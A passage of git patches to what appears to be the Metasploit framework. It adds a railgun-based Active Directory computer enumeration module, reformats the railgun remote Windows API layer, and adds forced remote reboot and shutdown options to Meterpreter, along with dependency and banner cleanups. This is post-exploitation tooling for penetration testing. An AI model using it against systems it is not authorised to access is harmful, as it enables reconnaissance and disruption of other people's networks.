'whenChanged','uSNCreated','uSNChanged','name','objectGUID', # 'userAccountControl','badPwdCount','codePage','countryCode', @@ -63,20 +63,20 @@ def run # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' # ] - + print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) - + results_table = Rex::Ui::Text::Table.new( 'Header' => 'AD Computers', 'Indent' => 1, 'SortIndex' => -1, 'Columns' => attributes ) - + results.each do |result| row = [] - + result['attributes'].each do |attr| if attr['values'].nil? row << "" @@ -86,25 +86,25 @@ def run end results_table << row - + end - + print_line results_table.to_s if datastore['STORE'] stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) print_status("Results saved to: #{stored_path}") end end - + def wldap32 return client.railgun.wldap32 end - + def bind_default_ldap_server vprint_status ("Initializing LDAP connection.") session_handle = wldap32.ldap_sslinitA("\x00\x00\x00\x00", 389, 0)['return'] vprint_status("LDAP Handle: #{session_handle}") - + if session_handle == 0 print_error("Unable to connect to LDAP server") return 0 @@ -112,20 +112,20 @@ def bind_default_ldap_server vprint_status ("Binding to LDAP server.") bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE - + if bind != 0 print_error("Unable to bind to LDAP server") return 0 - end - + end + return session_handle end def query_ldap(session_handle, base, scope, filter, attributes) vprint_status ("Searching LDAP directory.") - search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) + search = wldap32.ldap_search_sA(session_handle, base, scope, filter, nil, 0, 4) vprint_status("search: #{search}") - + if search['return'] != 0 print_error("No results") wldap32.ldap_msgfree(search['res']) @@ -134,42 +134,42 @@ def query_ldap(session_handle, base, scope, filter, attributes) search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] print_status("Entries retrieved: #{search_count}") - + vprint_status("Retrieving results...") - + entries = {} entry_results = [] - + if datastore['MAX_SEARCH'] == 0 max_search = search_count else max_search = [datastore['MAX_SEARCH'], search_count].min end - + # user definied limit on entries to search? for i in 0..(max_search-1) print '.' - + if i==0 entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") - + attribute_results = [] attributes.each do |attr| vprint_status("Attr: #{attr}") - + pp_value = wldap32.ldap_get_values(session_handle, entries[i], attr)['return'] vprint_status("ppValue: 0x#{pp_value.to_s(16)}") - + if pp_value == 0 vprint_error("No attribute value returned.") - else + else count = wldap32.ldap_count_values(pp_value)['return'] vprint_status "Value count: #{count}" - + value_results = [] if count < 1 vprint_error("Bad Value List") @@ -193,13 +193,13 @@ def query_ldap(session_handle, base, scope, filter, attributes) vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end - + attribute_results << {"name" => attr, "values" => value_results} end - + entry_results << {"id" => i, "attributes" => attribute_results} end - + print_line return entry_results end From 0fb36f20240aa237237a081800bc37f84cdc0eb5 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 28 Dec 2012 13:28:19 -0600 Subject: [PATCH 012/421] Get pg as a dependency of metasploit_data_models [#38274165] metasploit_data_models already declares pg as a runtime dependency in its gemspec, so there is no need to add pg as a direct dependency of metasploit-framework, since metasploit-framework only needs pg for metasploit_data_models. --- Gemfile | 2 -- Gemfile.lock | 1 - 2 files changed, 3 deletions(-) diff --git a/Gemfile b/Gemfile index 52d2e44c5135..0bb1135b0bf7 100755 --- a/Gemfile +++ b/Gemfile @@ -6,8 +6,6 @@ gem 'activesupport', '>= 3.0.0' gem 'activerecord' # Database models shared between framework and Pro. gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' -# Needed for module caching in Mdm::ModuleDetails -gem 'pg', '>= 0.11' group :development do # Markdown formatting for yard diff --git a/Gemfile.lock b/Gemfile.lock index 3f4ffb72e03d..a9531cb60126 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -60,7 +60,6 @@ DEPENDENCIES activerecord activesupport (>= 3.0.0) metasploit_data_models! - pg (>= 0.11) rake redcarpet rspec (>= 2.12) From 0b3143ff45a9a4250f724f0db324660a25fb5b1b Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 30 Dec 2012 16:32:15 +0000 Subject: [PATCH 013/421] Fix railgun EOL --- .../extensions/stdapi/railgun/railgun.rb | 598 +++++++++--------- 1 file changed, 299 insertions(+), 299 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb index 9c5dc4651c71..d0c3e1c60895 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb @@ -1,299 +1,299 @@ -# -*- coding: binary -*- -# Copyright (c) 2010, patrickHVE@googlemail.com -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * The names of the author may not be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# -# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. -# - -# -# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything -# - -require 'pp' -require 'enumerator' - -require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' -require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' -require 'rex/post/meterpreter/extensions/stdapi/railgun/util' -require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' -require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' -require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' - -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun - - -# -# The Railgun class to dynamically expose the Windows API. -# -class Railgun - - # - # Railgun::DLL's that have builtin definitions. - # - # If you want to add additional DLL definitions to be preloaded create a - # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. - # Naming is important and should follow convention. For example, if your - # dll's name was "my_dll" - # file name: def_my_dll.rb - # class name: Def_my_dll - # entry below: 'my_dll' - # - BUILTIN_DLLS = [ - 'kernel32', - 'ntdll', - 'user32', - 'ws2_32', - 'iphlpapi', - 'advapi32', - 'shell32', - 'netapi32', - 'crypt32', - 'wlanapi', - 'wldap32' - ].freeze - - ## - # Returns a Hash containing DLLs added to this instance with #add_dll - # as well as references to any frozen cached dlls added directly in #get_dll - # and copies of any frozen dlls (added directly with #add_function) - # that the user attempted to modify with #add_function. - # - # Keys are friendly DLL names and values are the corresponding DLL instance - attr_accessor :dlls - - ## - # Contains a reference to the client that corresponds to this instance of railgun - attr_accessor :client - - ## - # These DLLs are loaded lazily and then shared amongst all railgun instances. - # For safety reasons this variable should only be read/written within #get_dll. - @@cached_dlls = {} - - # if you are going to touch @@cached_dlls, wear protection - @@cache_semaphore = Mutex.new - - def initialize(client) - self.client = client - self.dlls = {} - end - - def self.builtin_dlls - BUILTIN_DLLS - end - - # - # Return this Railgun's Util instance. - # - def util - if @util.nil? - @util = Util.new(self, client.platform) - end - - return @util - end - - # - # Return this Railgun's WinConstManager instance, initially populated with - # constants defined in ApiConstants. - # - def constant_manager - # Loads lazily - return ApiConstants.manager - end - - # - # Read data from a memory address on the host (useful for working with - # LPVOID parameters) - # - def memread(address, length) - - raise "Invalid parameters." if(not address or not length) - - request = Packet.create_request('stdapi_railgun_memread') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) - end - - return nil - end - - # - # Write data to a memory address on the host (useful for working with - # LPVOID parameters) - # - def memwrite(address, data, length) - - raise "Invalid parameters." if(not address or not data or not length) - - request = Packet.create_request('stdapi_railgun_memwrite') - - request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) - request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) - - response = client.send_request(request) - if(response.result == 0) - return true - end - - return false - end - - # - # Adds a function to an existing DLL definition. - # - # If the DLL definition is frozen (ideally this should be the case for all - # cached dlls) an unfrozen copy is created and used henceforth for this - # instance. - # - def add_function(dll_name, function_name, return_type, params, windows_name=nil) - - unless known_dll_names.include?(dll_name) - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" - end - - dll = get_dll(dll_name) - - # For backwards compatibility, we ensure the dll is thawed - if dll.frozen? - # Duplicate not only the dll, but its functions as well. Frozen status will be lost - dll = Marshal.load(Marshal.dump(dll)) - - # Update local dlls with the modifiable duplicate - dlls[dll_name] = dll - end - - dll.add_function(function_name, return_type, params, windows_name) - end - - # - # Adds a DLL to this Railgun. - # - # The +windows_name+ is the name used on the remote system and should be - # set appropriately if you want to include a path or the DLL name contains - # non-ruby-approved characters. - # - # Raises an exception if a dll with the given name has already been - # defined. - # - def add_dll(dll_name, windows_name=dll_name) - - if dlls.has_key? dll_name - raise "A DLL of name #{dll_name} has already been loaded." - end - - dlls[dll_name] = DLL.new(windows_name, constant_manager) - end - - - def known_dll_names - return BUILTIN_DLLS | dlls.keys - end - - # - # Attempts to provide a DLL instance of the given name. Handles lazy - # loading and caching. Note that if a DLL of the given name does not - # exist, returns nil - # - def get_dll(dll_name) - - # If the DLL is not local, we now either load it from cache or load it lazily. - # In either case, a reference to the dll is stored in the collection "dlls" - # If the DLL can not be found/created, no actions are taken - unless dlls.has_key? dll_name - # We read and write to @@cached_dlls and rely on state consistency - @@cache_semaphore.synchronize do - if @@cached_dlls.has_key? dll_name - dlls[dll_name] = @@cached_dlls[dll_name] - elsif BUILTIN_DLLS.include? dll_name - # I highly doubt this case will ever occur, but I am paranoid - if dll_name !~ /^\w+$/ - raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" - end - - require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name - dll = Def.const_get('Def_' << dll_name).create_dll.freeze - - @@cached_dlls[dll_name] = dll - dlls[dll_name] = dll - end - end - - end - - return dlls[dll_name] - end - - # - # Fake having members like user32 and kernel32. - # reason is that - # ...user32.MessageBoxW() - # is prettier than - # ...dlls["user32"].functions["MessageBoxW"]() - # - def method_missing(dll_symbol, *args) - dll_name = dll_symbol.to_s - - unless known_dll_names.include? dll_name - raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" - end - - dll = get_dll(dll_name) - - return DLLWrapper.new(dll, client) - end - - # - # Return a Windows constant matching +str+. - # - def const(str) - return constant_manager.parse(str) - end - - # - # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) - # - def multi(functions) - if @multicaller.nil? - @multicaller = MultiCaller.new(client, self) - end - - return @multicaller.call(functions) - end -end - -end; end; end; end; end; end +# -*- coding: binary -*- +# Copyright (c) 2010, patrickHVE@googlemail.com +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright +# notice, this list of conditions and the following disclaimer in the +# documentation and/or other materials provided with the distribution. +# * The names of the author may not be used to endorse or promote products +# derived from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL patrickHVE@googlemail.com BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +# +# sf - Sept 2010 - Modified for x64 support and merged into the stdapi extension. +# + +# +# chao - June 2011 - major overhaul of dll lazy loading, caching, and bit of everything +# + +require 'pp' +require 'enumerator' + +require 'rex/post/meterpreter/extensions/stdapi/railgun/api_constants' +require 'rex/post/meterpreter/extensions/stdapi/railgun/tlv' +require 'rex/post/meterpreter/extensions/stdapi/railgun/util' +require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager' +require 'rex/post/meterpreter/extensions/stdapi/railgun/multicall' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll' +require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper' + +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun + + +# +# The Railgun class to dynamically expose the Windows API. +# +class Railgun + + # + # Railgun::DLL's that have builtin definitions. + # + # If you want to add additional DLL definitions to be preloaded create a + # definition class 'rex/post/meterpreter/extensions/stdapi/railgun/def/'. + # Naming is important and should follow convention. For example, if your + # dll's name was "my_dll" + # file name: def_my_dll.rb + # class name: Def_my_dll + # entry below: 'my_dll' + # + BUILTIN_DLLS = [ + 'kernel32', + 'ntdll', + 'user32', + 'ws2_32', + 'iphlpapi', + 'advapi32', + 'shell32', + 'netapi32', + 'crypt32', + 'wlanapi', + 'wldap32' + ].freeze + + ## + # Returns a Hash containing DLLs added to this instance with #add_dll + # as well as references to any frozen cached dlls added directly in #get_dll + # and copies of any frozen dlls (added directly with #add_function) + # that the user attempted to modify with #add_function. + # + # Keys are friendly DLL names and values are the corresponding DLL instance + attr_accessor :dlls + + ## + # Contains a reference to the client that corresponds to this instance of railgun + attr_accessor :client + + ## + # These DLLs are loaded lazily and then shared amongst all railgun instances. + # For safety reasons this variable should only be read/written within #get_dll. + @@cached_dlls = {} + + # if you are going to touch @@cached_dlls, wear protection + @@cache_semaphore = Mutex.new + + def initialize(client) + self.client = client + self.dlls = {} + end + + def self.builtin_dlls + BUILTIN_DLLS + end + + # + # Return this Railgun's Util instance. + # + def util + if @util.nil? + @util = Util.new(self, client.platform) + end + + return @util + end + + # + # Return this Railgun's WinConstManager instance, initially populated with + # constants defined in ApiConstants. + # + def constant_manager + # Loads lazily + return ApiConstants.manager + end + + # + # Read data from a memory address on the host (useful for working with + # LPVOID parameters) + # + def memread(address, length) + + raise "Invalid parameters." if(not address or not length) + + request = Packet.create_request('stdapi_railgun_memread') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return response.get_tlv_value(TLV_TYPE_RAILGUN_MEM_DATA) + end + + return nil + end + + # + # Write data to a memory address on the host (useful for working with + # LPVOID parameters) + # + def memwrite(address, data, length) + + raise "Invalid parameters." if(not address or not data or not length) + + request = Packet.create_request('stdapi_railgun_memwrite') + + request.add_tlv(TLV_TYPE_RAILGUN_MEM_ADDRESS, address) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_DATA, data) + request.add_tlv(TLV_TYPE_RAILGUN_MEM_LENGTH, length) + + response = client.send_request(request) + if(response.result == 0) + return true + end + + return false + end + + # + # Adds a function to an existing DLL definition. + # + # If the DLL definition is frozen (ideally this should be the case for all + # cached dlls) an unfrozen copy is created and used henceforth for this + # instance. + # + def add_function(dll_name, function_name, return_type, params, windows_name=nil) + + unless known_dll_names.include?(dll_name) + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, "")}" + end + + dll = get_dll(dll_name) + + # For backwards compatibility, we ensure the dll is thawed + if dll.frozen? + # Duplicate not only the dll, but its functions as well. Frozen status will be lost + dll = Marshal.load(Marshal.dump(dll)) + + # Update local dlls with the modifiable duplicate + dlls[dll_name] = dll + end + + dll.add_function(function_name, return_type, params, windows_name) + end + + # + # Adds a DLL to this Railgun. + # + # The +windows_name+ is the name used on the remote system and should be + # set appropriately if you want to include a path or the DLL name contains + # non-ruby-approved characters. + # + # Raises an exception if a dll with the given name has already been + # defined. + # + def add_dll(dll_name, windows_name=dll_name) + + if dlls.has_key? dll_name + raise "A DLL of name #{dll_name} has already been loaded." + end + + dlls[dll_name] = DLL.new(windows_name, constant_manager) + end + + + def known_dll_names + return BUILTIN_DLLS | dlls.keys + end + + # + # Attempts to provide a DLL instance of the given name. Handles lazy + # loading and caching. Note that if a DLL of the given name does not + # exist, returns nil + # + def get_dll(dll_name) + + # If the DLL is not local, we now either load it from cache or load it lazily. + # In either case, a reference to the dll is stored in the collection "dlls" + # If the DLL can not be found/created, no actions are taken + unless dlls.has_key? dll_name + # We read and write to @@cached_dlls and rely on state consistency + @@cache_semaphore.synchronize do + if @@cached_dlls.has_key? dll_name + dlls[dll_name] = @@cached_dlls[dll_name] + elsif BUILTIN_DLLS.include? dll_name + # I highly doubt this case will ever occur, but I am paranoid + if dll_name !~ /^\w+$/ + raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" + end + + require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name + dll = Def.const_get('Def_' << dll_name).create_dll.freeze + + @@cached_dlls[dll_name] = dll + dlls[dll_name] = dll + end + end + + end + + return dlls[dll_name] + end + + # + # Fake having members like user32 and kernel32. + # reason is that + # ...user32.MessageBoxW() + # is prettier than + # ...dlls["user32"].functions["MessageBoxW"]() + # + def method_missing(dll_symbol, *args) + dll_name = dll_symbol.to_s + + unless known_dll_names.include? dll_name + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" + end + + dll = get_dll(dll_name) + + return DLLWrapper.new(dll, client) + end + + # + # Return a Windows constant matching +str+. + # + def const(str) + return constant_manager.parse(str) + end + + # + # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) + # + def multi(functions) + if @multicaller.nil? + @multicaller = MultiCaller.new(client, self) + end + + return @multicaller.call(functions) + end +end + +end; end; end; end; end; end From 04714893c8e95a960e0c3dc374c06906c81f2873 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Fri, 4 Jan 2013 09:20:56 +0000 Subject: [PATCH 014/421] Add force option to reboot command --- .../extensions/stdapi/constants.rb | 63 +++++++++++++++++-- .../extensions/stdapi/sys/power.rb | 17 +++-- .../console/command_dispatcher/stdapi/sys.rb | 63 ++++++++++++++++--- 3 files changed, 121 insertions(+), 22 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb index 332dda8a76e6..b18b25af216c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb @@ -83,14 +83,14 @@ KEY_WOW64_64KEY = 0x00000100 KEY_WOW64_32KEY = 0x00000200 KEY_READ = (STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | - KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE + KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE KEY_WRITE = (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | - KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE + KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE KEY_EXECUTE = KEY_READ KEY_ALL_ACCESS = (STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | - KEY_SET_VALUE | KEY_CREATE_SUB_KEY | - KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY | - KEY_CREATE_LINK) & ~SYNCHRONIZE + KEY_SET_VALUE | KEY_CREATE_SUB_KEY | + KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY | + KEY_CREATE_LINK) & ~SYNCHRONIZE ## # @@ -180,6 +180,59 @@ EWX_POWEROFF = 0x00000008 EWX_FORCEIFHUNG = 0x00000010 +## +# +# Shutdown Reason Codes +# +## +SHTDN_REASON_MINOR_DC_PROMOTION = 0x00000021 +SHTDN_REASON_MAJOR_APPLICATION = 0x00040000 +SHTDN_REASON_MAJOR_HARDWARE = 0x00010000 +SHTDN_REASON_FLAG_COMMENT_REQUIRED = 0x01000000 +SHTDN_REASON_FLAG_DIRTY_UI = 0x08000000 +SHTDN_REASON_MINOR_UNSTABLE = 0x00000006 +SHTDN_REASON_MINOR_SECURITYFIX_UNINSTALL = 0x00000018 +SHTDN_REASON_MINOR_ENVIRONMENT = 0x00000000 +SHTDN_REASON_MAJOR_LEGACY_API = 0x00070000 +SHTDN_REASON_MINOR_DC_DEMOTION = 0x00000022 +SHTDN_REASON_MINOR_SECURITYFIX = 0x00000012 +SHTDN_REASON_FLAG_CLEAN_UI = 0x04000000 +SHTDN_REASON_MINOR_HOTFIX = 0x00000011 +SHTDN_REASON_MINOR_CORDUNPLUGGED = 0x00000000 +SHTDN_REASON_MINOR_HOTFIX_UNINSTALL = 0x00000017 +SHTDN_REASON_FLAG_USER_DEFINED = 0x40000000 +SHTDN_REASON_MINOR_SYSTEMRESTORE = 0x00000001 +SHTDN_REASON_MINOR_OTHERDRIVER = 0x00000000 +SHTDN_REASON_MINOR_WMI = 0x00000015 +SHTDN_REASON_MINOR_INSTALLATION = 0x00000002 +SHTDN_REASON_MINOR_BLUESCREEN = 0x0000000F +SHTDN_REASON_MAJOR_SOFTWARE = 0x00030000 +SHTDN_REASON_MINOR_NETWORKCARD = 0x00000009 +SHTDN_REASON_MINOR_SERVICEPACK_UNINSTALL = 0x00000016 +SHTDN_REASON_MINOR_SERVICEPACK = 0x00000010 +SHTDN_REASON_MINOR_UPGRADE = 0x00000003 +SHTDN_REASON_FLAG_PLANNED = 0x80000000 +SHTDN_REASON_MINOR_MMC = 0x00000019 +SHTDN_REASON_MINOR_POWER_SUPPLY = 0x00000000 +SHTDN_REASON_MINOR_MAINTENANCE = 0x00000001 +SHTDN_REASON_VALID_BIT_MASK = 0x00000000 +SHTDN_REASON_MAJOR_NONE = 0x00000000 +SHTDN_REASON_MAJOR_POWER = 0x00060000 +SHTDN_REASON_FLAG_DIRTY_PROBLEM_ID_REQUIRED = 0x02000000 +SHTDN_REASON_MINOR_OTHER = 0x00000000 +SHTDN_REASON_MINOR_PROCESSOR = 0x00000008 +SHTDN_REASON_MAJOR_OTHER = 0x00000000 +SHTDN_REASON_MINOR_DISK = 0x00000007 +SHTDN_REASON_MINOR_NETWORK_CONNECTIVITY = 0x00000014 +SHTDN_REASON_MAJOR_OPERATINGSYSTEM = 0x00020000 +SHTDN_REASON_MINOR_HUNG = 0x00000005 +SHTDN_REASON_MINOR_TERMSRV = 0x00000020 +SHTDN_REASON_MINOR_NONE = 0x00000000 +SHTDN_REASON_MINOR_RECONFIG = 0x00000004 +SHTDN_REASON_MAJOR_SYSTEM = 0x00050000 +SHTDN_REASON_MINOR_HARDWARE_DRIVER = 0x00000000 +SHTDN_REASON_MINOR_SECURITY = 0x00000013 +SHTDN_REASON_DEFAULT = SHTDN_REASON_MAJOR_OTHER | SHTDN_REASON_MINOR_OTHER ## # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb index 001131651fb3..cb3d90f804dc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb @@ -28,33 +28,32 @@ class < [ false, "Execute process on the meterpreters current desktop" ], "-s" => [ true, "Execute process in a given session as the session user" ]) + # + # Options used by the 'reboot' command. + # + @@reboot_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-f" => [ true, "Force a reboot, valid values [1|2]" ]) + + # + # Options used by the 'shutdown' command. + # + @@shutdown_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) + # # Options used by the 'reg' command. # @@ -311,14 +325,14 @@ def is_valid_pid?(pid) def cmd_ps(*args) processes = client.sys.process.get_processes @@ps_opts.parse(args) do |opt, idx, val| - case opt + case opt when "-h" cmd_ps_help return true when "-S" print_line "Filtering on process name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| if val.nil? or val.empty? print_line "You must supply a search term!" return false @@ -329,7 +343,7 @@ def cmd_ps(*args) when "-A" print_line "Filtering on arch..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| next if proc['arch'].nil? or proc['arch'].empty? if val.nil? or val.empty? or !(val == "x86" or val == "x86_64") print_line "You must select either x86 or x86_64" @@ -341,14 +355,14 @@ def cmd_ps(*args) when "-s" print_line "Filtering on SYSTEM processes..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM" end processes = searched_procs when "-U" print_line "Filtering on user name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| if val.nil? or val.empty? print_line "You must supply a search term!" return false @@ -371,7 +385,7 @@ def cmd_ps(*args) def cmd_ps_help print_line "Use the command with no arguments to see all running processes." print_line "The following options can be used to filter those results:" - + print_line @@ps_opts.usage end @@ -381,9 +395,25 @@ def cmd_ps_help # Reboots the remote computer. # def cmd_reboot(*args) + force = 0 + + if args.length == 1 and args[0].strip == "-h" + print( + "Usage: reboot [options]\n\n" + + "Reboot the remote machine.\n" + + @@reboot_opts.usage) + return true + end + + @@reboot_opts.parse(args) { |opt, idx, val| + case opt + when "-f" + force = val.to_i + end + } print_line("Rebooting...") - client.sys.power.reboot + client.sys.power.reboot(force, SHTDN_REASON_DEFAULT) end # @@ -683,9 +713,26 @@ def cmd_sysinfo(*args) # Shuts down the remote computer. # def cmd_shutdown(*args) + force = 0 + + if args.length == 1 and args[0].strip == "-h" + print( + "Usage: shutdown [options]\n\n" + + "Shutdown the remote machine.\n" + + @@shutdown_opts.usage) + return true + end + + @@shutdown_opts.parse(args) { |opt, idx, val| + case opt + when "-f" + force = val.to_i + end + } + print_line("Shutting down...") - client.sys.power.shutdown + client.sys.power.shutdown(force, SHTDN_REASON_DEFAULT) end From a0ba2f4951fda3d1f32dfec63d6f7870d4398145 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 9 Jan 2013 19:54:08 -0600 Subject: [PATCH 015/421] Seperate data from code Banners are content more than anything. --- lib/msf/ui/banner.rb | 308 ++---------------------- lib/msf/ui/logos/3kom-superhack.txt | 19 ++ lib/msf/ui/logos/branded-longhorn.txt | 10 + lib/msf/ui/logos/cow-head.txt | 17 ++ lib/msf/ui/logos/cowsay.txt | 10 + lib/msf/ui/logos/figlet.txt | 7 + lib/msf/ui/logos/i-heart-shells.txt | 9 + lib/msf/ui/logos/metasploit-shield.txt | 22 ++ lib/msf/ui/logos/missile-command.txt | 30 +++ lib/msf/ui/logos/ninja.txt | 31 +++ lib/msf/ui/logos/null-pointer-deref.txt | 38 +++ lib/msf/ui/logos/r7-metasploit.txt | 16 ++ lib/msf/ui/logos/test.rb | 5 + lib/msf/ui/logos/wake-up-neo.txt | 25 ++ lib/msf/ui/logos/workflow-cartoon.txt | 22 ++ 15 files changed, 285 insertions(+), 284 deletions(-) create mode 100644 lib/msf/ui/logos/3kom-superhack.txt create mode 100644 lib/msf/ui/logos/branded-longhorn.txt create mode 100644 lib/msf/ui/logos/cow-head.txt create mode 100644 lib/msf/ui/logos/cowsay.txt create mode 100644 lib/msf/ui/logos/figlet.txt create mode 100644 lib/msf/ui/logos/i-heart-shells.txt create mode 100644 lib/msf/ui/logos/metasploit-shield.txt create mode 100644 lib/msf/ui/logos/missile-command.txt create mode 100644 lib/msf/ui/logos/ninja.txt create mode 100644 lib/msf/ui/logos/null-pointer-deref.txt create 